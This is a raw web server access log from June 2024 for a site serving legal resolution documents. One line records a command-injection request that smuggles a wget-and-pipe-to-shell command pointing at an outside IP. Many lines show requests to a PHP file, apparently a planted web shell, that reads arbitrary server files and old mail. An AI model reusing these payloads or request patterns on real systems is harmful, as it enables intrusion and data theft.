47.128.119.105 - - [16/Jun/2024:14:38:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4131.pdf&ft=download&white=1 HTTP/1.1" 200 179879
216.244.66.195 - - [16/Jun/2024:14:38:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3499.pdf HTTP/1.1" 200 315548
216.245.221.92 - - [16/Jun/2024:14:38:27 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.22 - - [16/Jun/2024:14:38:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/03179.pdf HTTP/1.1" 304 -
47.128.44.23 - - [16/Jun/2024:14:38:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3958.pdf&ft=download&white=1 HTTP/1.1" 200 413351
201.245.192.253 - - [16/Jun/2024:14:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34577
216.244.66.195 - - [16/Jun/2024:14:39:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3715.pdf HTTP/1.1" 200 353986
47.128.119.238 - - [16/Jun/2024:14:39:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2163.pdf&ft=download&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C HTTP/1.1" 200 2649766
201.245.192.253 - - [16/Jun/2024:14:39:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.40 - - [16/Jun/2024:14:39:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2693.pdf&ft=download HTTP/1.1" 200 364199
201.245.192.253 - - [16/Jun/2024:14:39:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34570
47.128.45.218 - - [16/Jun/2024:14:39:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=01233.pdf&ft=download HTTP/1.1" 200 97958
47.128.29.174 - - [16/Jun/2024:14:40:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4162.pdf&ft=download HTTP/1.1" 200 347815
201.245.192.253 - - [16/Jun/2024:14:40:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.113 - - [16/Jun/2024:14:40:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2141.pdf&ft=download HTTP/1.1" 200 466599
47.128.43.35 - - [16/Jun/2024:14:40:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2551.pdf&ft=download&white=1 HTTP/1.1" 200 1003174
47.128.127.4 - - [16/Jun/2024:14:41:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4254.pdf&ft=download HTTP/1.1" 200 335527
201.245.192.253 - - [16/Jun/2024:14:41:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:14:41:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.224.128.43 - - [16/Jun/2024:14:41:24 -0500] "GET / HTTP/1.1" 200 319
66.249.66.20 - - [16/Jun/2024:14:41:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0745.pdf HTTP/1.1" 200 472789
47.128.37.255 - - [16/Jun/2024:14:41:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=01234.pdf&ft=download HTTP/1.1" 200 409254
172.22.2.4 - - [16/Jun/2024:14:40:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.62 - - [16/Jun/2024:14:41:51 -0500] "GET /Publicaciones/2024EE107830.pdf HTTP/1.1" 404 228
47.128.43.82 - - [16/Jun/2024:14:41:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1673.pdf&ft=download HTTP/1.1" 200 409255
47.128.30.210 - - [16/Jun/2024:14:42:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002007.tif&ft=download HTTP/1.1" 200 282275
201.245.192.253 - - [16/Jun/2024:14:42:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.33 - - [16/Jun/2024:14:42:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2948.pdf&ft=download HTTP/1.1" 200 409255
172.22.2.4 - - [16/Jun/2024:14:41:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
66.249.66.20 - - [16/Jun/2024:14:42:54 -0500] "GET /BLA/resoluciones/AUTOS%202014/5792.pdf HTTP/1.1" 200 199883
47.128.30.31 - - [16/Jun/2024:14:42:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1099.pdf&ft=download&white=1 HTTP/1.1" 200 749223
156.59.198.136 - - [16/Jun/2024:14:43:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_ptl0ej19aavf62fct8hparuh30 HTTP/1.0" 200 1034
201.245.192.253 - - [16/Jun/2024:14:43:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:14:43:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.46.139 - - [16/Jun/2024:14:43:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001552.tif&ft=download HTTP/1.1" 200 20131
47.128.30.48 - - [16/Jun/2024:14:43:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4042.pdf&ft=download HTTP/1.1" 200 20135
172.22.2.4 - - [16/Jun/2024:14:44:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2024:14:44:17 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
54.36.148.166 - - [16/Jun/2024:14:44:18 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2024:14:44:19 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [16/Jun/2024:14:44:19 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [16/Jun/2024:14:44:20 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
47.128.54.125 - - [16/Jun/2024:14:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=FreeImage.dll&ft=download HTTP/1.1" 200 20129
201.245.192.253 - - [16/Jun/2024:14:44:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.116 - - [16/Jun/2024:14:44:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=accordion.min.js&ft=download HTTP/1.1" 200 585
156.59.198.135 - - [16/Jun/2024:14:45:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_4mp6iut3u6t8qehmvnl42jb9f1 HTTP/1.0" 200 1034
172.22.2.4 - - [16/Jun/2024:14:45:04 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:14:45:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.228 - - [16/Jun/2024:14:45:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4124.pdf&ft=download HTTP/1.1" 200 351911
47.128.54.122 - - [16/Jun/2024:14:45:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5883.pdf&ft=img&white=1 HTTP/1.1" 200 98063
47.128.23.31 - - [16/Jun/2024:14:46:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1446.pdf&ft=download HTTP/1.1" 200 777895
216.244.66.195 - - [16/Jun/2024:14:46:15 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:14:46:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:14:46:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.151 - - [16/Jun/2024:14:46:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=01413.pdf&ft=download HTTP/1.1" 200 339622
185.191.127.212 - - [16/Jun/2024:14:46:43 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.28.219 - - [16/Jun/2024:14:46:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6342.pdf&ft=download HTTP/1.1" 200 876199
47.128.23.208 - - [16/Jun/2024:14:47:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2832.pdf&ft=download HTTP/1.1" 200 458407
201.245.192.253 - - [16/Jun/2024:14:47:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.31 - - [16/Jun/2024:14:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2230.pdf&ft=download HTTP/1.1" 200 20135
172.22.2.4 - - [16/Jun/2024:14:46:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.125.159 - - [16/Jun/2024:14:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001763.tif&ft=download HTTP/1.1" 200 241182
47.128.115.184 - - [16/Jun/2024:14:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2621.pdf&ft=download&white=1 HTTP/1.1" 200 372391
201.245.192.253 - - [16/Jun/2024:14:48:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:14:48:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:14:46:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
156.59.198.136 - - [16/Jun/2024:14:48:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_rirctr3m0367v08uma4bp0ntt1 HTTP/1.0" 200 1034
47.128.41.75 - - [16/Jun/2024:14:48:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002488.tif&ft=download HTTP/1.1" 200 204310
47.128.115.22 - - [16/Jun/2024:14:49:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Ccertificates%5C&f=ca-bundle.crt&ft=download&white=1 HTTP/1.1" 200 244983
201.245.192.253 - - [16/Jun/2024:14:49:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.192 - - [16/Jun/2024:14:49:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002354.tif&ft=download HTTP/1.1" 200 184908
47.128.22.7 - - [16/Jun/2024:14:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=version.php&ft=download&white=1 HTTP/1.1" 200 649
40.77.167.49 - - [16/Jun/2024:14:50:03 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2012%2F HTTP/1.1" 200 140066
156.59.198.135 - - [16/Jun/2024:14:50:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_o6k1vub0pfl67i1b6qh300snf5 HTTP/1.0" 200 1034
201.245.192.253 - - [16/Jun/2024:14:50:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.176 - - [16/Jun/2024:14:50:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2605.pdf&ft=download HTTP/1.1" 200 368295
47.128.23.61 - - [16/Jun/2024:14:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1782.pdf&ft=download HTTP/1.1" 200 470695
201.245.192.253 - - [16/Jun/2024:14:51:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.126.224 - - [16/Jun/2024:14:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=post-formats.php&ft=download HTTP/1.1" 200 6513
201.245.192.253 - - [16/Jun/2024:14:51:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.120.81 - - [16/Jun/2024:14:51:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2515.pdf&ft=notepad&white=1 HTTP/1.1" 200 140491
40.77.167.9 - - [16/Jun/2024:14:51:54 -0500] "GET /Publicaciones/2024EE90836.pdf HTTP/1.1" 404 227
47.128.114.26 - - [16/Jun/2024:14:52:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2427.pdf&ft=img&white=1 HTTP/1.1" 200 827151
172.22.2.4 - - [16/Jun/2024:14:50:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61446
201.245.192.253 - - [16/Jun/2024:14:52:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.114.225 - - [16/Jun/2024:14:52:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cimages&f=SDQS.jpg&ft=download HTTP/1.1" 200 47976
172.22.2.4 - - [16/Jun/2024:14:52:25 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
47.128.16.213 - - [16/Jun/2024:14:52:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2046.pdf&ft=download&white=1 HTTP/1.1" 200 294567
47.128.113.75 - - [16/Jun/2024:14:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2742.pdf&ft=download HTTP/1.1" 200 1003174
201.245.192.253 - - [16/Jun/2024:14:53:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:14:53:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.113.78 - - [16/Jun/2024:14:53:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=l10n.php&ft=download&white=1 HTTP/1.1" 200 31484
172.22.2.4 - - [16/Jun/2024:14:51:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.54.124 - - [16/Jun/2024:14:53:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002371.tif&ft=download HTTP/1.1" 200 95578
139.162.87.5 - - [16/Jun/2024:14:53:50 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
47.128.118.129 - - [16/Jun/2024:14:54:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2783.pdf&ft=download HTTP/1.1" 200 929447
172.22.2.4 - - [16/Jun/2024:14:52:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [16/Jun/2024:14:54:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.56 - - [16/Jun/2024:14:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=phpinfo.php&ft=download HTTP/1.1" 200 389
47.128.97.250 - - [16/Jun/2024:14:54:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6623.pdf&ft=img&white=1 HTTP/1.1" 200 20239
66.249.66.19 - - [16/Jun/2024:14:55:02 -0500] "GET /Publicaciones/2024EE68224.pdf HTTP/1.1" 404 227
66.249.66.19 - - [16/Jun/2024:14:55:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/3824.pdf HTTP/1.1" 200 2698224
66.249.66.19 - - [16/Jun/2024:14:55:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/09671.pdf HTTP/1.1" 200 377326
66.249.66.19 - - [16/Jun/2024:14:55:04 -0500] "GET /bla/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 8194919
47.128.97.49 - - [16/Jun/2024:14:55:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001114.tif&white=1 HTTP/1.1" 200 282372
201.245.192.253 - - [16/Jun/2024:14:55:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.61.131 - - [16/Jun/2024:14:55:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3907.pdf&ft=download HTTP/1.1" 200 339623
47.128.97.5 - - [16/Jun/2024:14:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5Cclass&f=personal.php&ft=download HTTP/1.1" 200 4235
201.245.192.253 - - [16/Jun/2024:14:56:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.53.99 - - [16/Jun/2024:14:56:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3391.pdf&ft=download&white=1 HTTP/1.1" 200 323239
201.245.192.253 - - [16/Jun/2024:14:56:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.48 - - [16/Jun/2024:14:56:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cimages&f=INTRANET.jpg&ft=download HTTP/1.1" 200 37297
47.128.32.170 - - [16/Jun/2024:14:56:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes&f=continents-cities.php&ft=download HTTP/1.1" 200 17877
47.128.47.196 - - [16/Jun/2024:14:57:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=edit-tags.php&ft=download HTTP/1.1" 200 20691
201.245.192.253 - - [16/Jun/2024:14:57:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.252 - - [16/Jun/2024:14:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2099.pdf&ft=download HTTP/1.1" 200 364199
216.244.66.195 - - [16/Jun/2024:14:57:50 -0500] "GET /Residuos/pinturas/pinturas.html HTTP/1.1" 200 1959
216.244.66.195 - - [16/Jun/2024:14:58:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/5526.pdf HTTP/1.1" 200 195896
47.128.45.177 - - [16/Jun/2024:14:58:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1716.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 739597
201.245.192.253 - - [16/Jun/2024:14:58:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.208 - - [16/Jun/2024:14:58:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4500.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 961675
216.245.221.92 - - [16/Jun/2024:14:58:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:14:58:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/5564.pdf HTTP/1.1" 200 1078234
47.128.99.221 - - [16/Jun/2024:14:58:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page35.swf&ft=code&white=1 HTTP/1.1" 200 21736
47.128.29.105 - - [16/Jun/2024:14:59:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&f=mail-20150206-1419-719000.txt HTTP/1.1" 200 2758
172.22.2.4 - - [16/Jun/2024:14:57:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:14:59:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.203 - - [16/Jun/2024:14:59:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&f=mail-20150906-0721-372000.txt HTTP/1.1" 200 2758
216.244.66.195 - - [16/Jun/2024:14:59:27 -0500] "GET /BLA/resoluciones/AUTOS%202010/5693.pdf HTTP/1.1" 200 172467
186.102.59.112 - - [16/Jun/2024:14:59:47 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19CFiuM5kml8Z4FoUdBxi02MuIO4oP56f0wRwzTBOFrHLPRE7G8Ccc+AEW5fhAH95Asku9iWSthFRaKHczfps2TFF7iwv19uYxqRQeWwpyRJczsorKcxtL2lga6uht5xADdLjgKQyWXYoyI4TEIAopVdkTMN3tm7R4JX8TtVLHGa840yOMLnHiYujvKUPwHcULkW2OwAO21YaPMvrgixQpVu+omvJT7jZfGsDJBZGhYTTQoNTamlDCgWnJEj65V7uhSKiyu67Py0w==&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
186.102.59.112 - - [16/Jun/2024:14:59:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+MHIJMpD3/i+AsqpjKWw59hSuaQ3RrAOiYFR+VY+O7qpRLjJo3pPjrzE4IYUf2XPAdTvFqOdMcN1fmcP+eTznvrHyAPBN9PU4MupBYtbIgLGfWs3kgn4bFuEDnVDludBrSHxMlpe0gPOxx51XPWeuoEYtunzHJV7BFfmuroPShAwnvWWG/aBrOStHGiqqlpvgYv1j9BE9iux8gVLdXdmi55UmnZBP2Iqu3hcV5DeP9LQDNkWM69Q/HsgqS6iErpuBEa15/cIVV/yA6gLe5rTPdxsR8HGkaWOT/MHoNDX1PViWento2sXRqUSoG+XbvxH9PrOthmzMcDNLOWLHLeXW8Vr/s/Gb1Z+0uElOauys5GhpawYoddsUQaMVWXlG/Srq0cSDbmpD2dtZwAxQEWhYNlPHy51+/QTDhgC0LtwUb41MKBuEf6IAigZeMo45p9mRTR1yiPbDqOIsGH65wd5+LdM9DCQ4hDaKXieB2ocgzUIxvpudU6W3ADnXkWmNknu2W2n/dD2EpoOfz6UnB0QlRn43sYPKxW/xcfGplvIomvOF1LJr3SOFWlASEex+SJXUDiBwYq56Njwv/gP1hYWD9ga5RSRDyvBbLaEvRtBp/ig1jlLvaC/gagu/pYDGmFziml7IFTRqj+Bz2Gkrj01NczNPUHJXzS0KIZvTn1jgMqGavnymvH3wLN20kLvOs0DcI+ryEjLQfRY8ldVuEJbLurA15V6zzkCtvfjdH8aNyGcvKiYC3esplEAKjGFxN+x1kFLtIHJJ9FDLAX/tWMlZkCS9NtEarvzDPEyebxoDxU7+M8L1kN+VbT3D9n3Dc9dfzxS4Kwh+HOYk2fRpuHgG8fmfYWFGb/purrQFG1Nr6Agm3Ca2S9DPJFDRnLJd7udKX1dqYdQcrc5GJwqtO7UJk8H5aXDJIrjU7QbYbXZzYXSg5FAwh+aufFtq9RrJqhJjWCqMNhDZgU6tnejuutFC92mv5pAk1tIeM1N4UIKwrJ65QBQpnN4n8NfvvaNwiaSCUuF4zZAofLPHFT9zqcXtKaeApF57cG8fWxLMMaqcufpHD+Sl5mh1O5+zMTnXZzAnGMBu6R/IOqGqi2BoKaUivt4/pKl9ZnYZ3VBUWuHL8JYHbyCDPjpJ25JUCGkZ2nn3vCdR3d99URQMAbX3ed9EyGWSzSoZZPYwTg+smPRODqWjE4u8NTTn1Trjkw/3RzL8dn+PX+z6mnLhGBL3U24SW+TRcMCFi6nZvbNyFBH5UmLBA1ByssW/sPd/IsWkLmqGDswH+LPWst9SR8RAWE9s+Rble9OxWdr8jixbnQ4u3Q0B3v822BSBz5dnEhaCuWTVvgNoCi7H/z7oJEh+dFQr7maybv+HySvcU/SJRWjBf+C91EphImVS+xcRwOdOmuJDRu1dDnxOVR6/u9YYeD4htCOuwgaTFH8eMA